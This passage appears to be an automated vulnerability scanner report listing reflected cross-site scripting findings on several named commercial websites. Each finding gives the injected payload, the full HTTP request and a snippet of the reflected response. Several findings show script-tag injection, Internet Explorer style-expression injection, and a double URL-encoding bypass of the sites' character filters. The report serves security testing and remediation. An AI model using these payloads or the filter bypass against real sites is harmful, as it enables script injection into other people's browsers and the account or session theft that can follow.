Set-Cookie: PHPSESSID=spgj6939rjejseveijoefseot5; path=/
Set-Cookie: layoutbar=deleted; expires=Wed, 03-Feb-2010 22:02:23 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:02:24 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8323
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html dir="ltr" lang="pl-PL">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e81"><script>alert(1)</script>49b2497dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wholesale-Shower-Faucets_c286390e81"><script>alert(1)</script>49b2497dc HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco ...[SNIP]... <a href="/wholesale-Shower-Faucets_c286390e81"><script>alert(1)</script>49b2497dc"> ...[SNIP]...
3.122. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightinthebox.com
Path:
/wholesale-Shower-Faucets_c2863
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c002"><script>alert(1)</script>7f0bb6aab4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wholesale-Shower-Faucets_c2863?8c002"><script>alert(1)</script>7f0bb6aab4f=1 HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco ...[SNIP]... <a class="sub-menu-icon" href="/wholesale-Shower-Faucets_c2863?8c002"><script>alert(1)</script>7f0bb6aab4f=1#nogo" rel="nofollow" title=""> ...[SNIP]...
3.123. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lightinthebox.com
Path:
/wholesale-Shower-Faucets_c2863
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82d7d'%3balert(1)//5681bfb5b3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82d7d';alert(1)//5681bfb5b3e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wholesale-Shower-Faucets_c2863?82d7d'%3balert(1)//5681bfb5b3e=1 HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8e5e2<a>074b39b533a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-aasG6JkxVvmNA8e5e2<a>074b39b533a HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Thu, 03 Feb 2011 22:03:07 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> p-aasG6JkxVvmNA8e5e2<a>074b39b533a</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aabbe"><a>fe7c65bf24b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-aasG6JkxVvmNAaabbe"><a>fe7c65bf24b HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Thu, 03 Feb 2011 22:03:07 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d612%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220eedd2683a3 was submitted in the REST URL parameter 1. This input was echoed as 1d612"style="x:expression(alert(1))"0eedd2683a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /1d612%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220eedd2683a3/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:59 GMT
Content-Length: 8711
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0rroqt55mx5ciq55y2wqysn5; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:59 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0935%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522182a262986e was submitted in the REST URL parameter 1. This input was echoed as f0935"style="x:expression(alert(1))"182a262986e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /buyf0935%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522182a262986e/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:55 GMT
Content-Length: 8732
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/
Set-Cookie: ASP.NET_SessionId=u5pklnekx3dx2wzgqqztpun5; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:55 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fed4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522152282d3cc2 was submitted in the REST URL parameter 2. This input was echoed as 4fed4"style="x:expression(alert(1))"152282d3cc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /buy/4fed4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522152282d3cc2 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:10 GMT
Content-Length: 8711
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=nmr5smvrazti5abqjnbbtv45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:10 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1baf%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522056ce7adff3 was submitted in the REST URL parameter 2. This input was echoed as c1baf"style="x:expression(alert(1))"056ce7adff3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /buy/x22c1baf%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522056ce7adff3 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:05 GMT
Content-Length: 8732
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dvui0v455qaojrfdct104guc; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:05 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.130. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/buy/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61661"style%3d"x%3aexpression(alert(1))"aa36938865b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61661"style="x:expression(alert(1))"aa36938865b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /buy/x22?61661"style%3d"x%3aexpression(alert(1))"aa36938865b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zuev0255yk14t1frw24v3j55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8753
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.131. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/buy/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b9c"style%3d"x%3aexpression(alert(1))"07d1f7b8086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b9c"style="x:expression(alert(1))"07d1f7b8086 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /buy/x22?47b9c"style%3d"x%3aexpression(alert(1))"07d1f7b8086=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=sbcbwyb2aq3qzfu15i0dsh55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8753
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a862%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8fd8df6ce03 was submitted in the REST URL parameter 1. This input was echoed as 2a862"><script>alert(1)</script>8fd8df6ce03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /2a862%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8fd8df6ce03?id=340839/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:32 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dc5mez55nymwryfaavsylt55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8844
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26549339e2c was submitted in the REST URL parameter 1. This input was echoed as 96d2c"><script>alert(1)</script>26549339e2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloads96d2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26549339e2c?id=340839/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/
Set-Cookie: ASP.NET_SessionId=q4uupajw15d2f4bqiizdyum2; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8907
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252271fe023e54 was submitted in the REST URL parameter 1. This input was echoed as 6fd6e"style="x:expression(alert(1))"71fe023e54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloads6fd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252271fe023e54 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/ Set-Cookie: ASP.NET_SessionId=yyv5x0450piuis45ejmzuryy; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8739 Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a12%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228ae5fca1f39 was submitted in the REST URL parameter 1. This input was echoed as 75a12"style="x:expression(alert(1))"8ae5fca1f39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /75a12%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228ae5fca1f39 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:31 GMT Content-Length: 8683 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: ASP.NET_SessionId=jl33dq55fge2ij55usujg355; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:31 GMT Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1f7d"><script>alert(1)</script>1bd1fdf7711 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads?id=340839/x22/x3eSmartDrawa1f7d"><script>alert(1)</script>1bd1fdf7711 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5facb"><script>alert(1)</script>49b68308620 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads?id=5facb"><script>alert(1)</script>49b68308620 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.138. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/downloads
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8433d"><script>alert(1)</script>f5beed3ebcb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads?8433d"><script>alert(1)</script>f5beed3ebcb=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.139. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/downloads
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aec6"><script>alert(1)</script>133a985f46b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads?9aec6"><script>alert(1)</script>133a985f46b=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2601%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cc75ed19a87 was submitted in the REST URL parameter 1. This input was echoed as b2601"style="x:expression(alert(1))"cc75ed19a87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloadsb2601%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cc75ed19a87/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
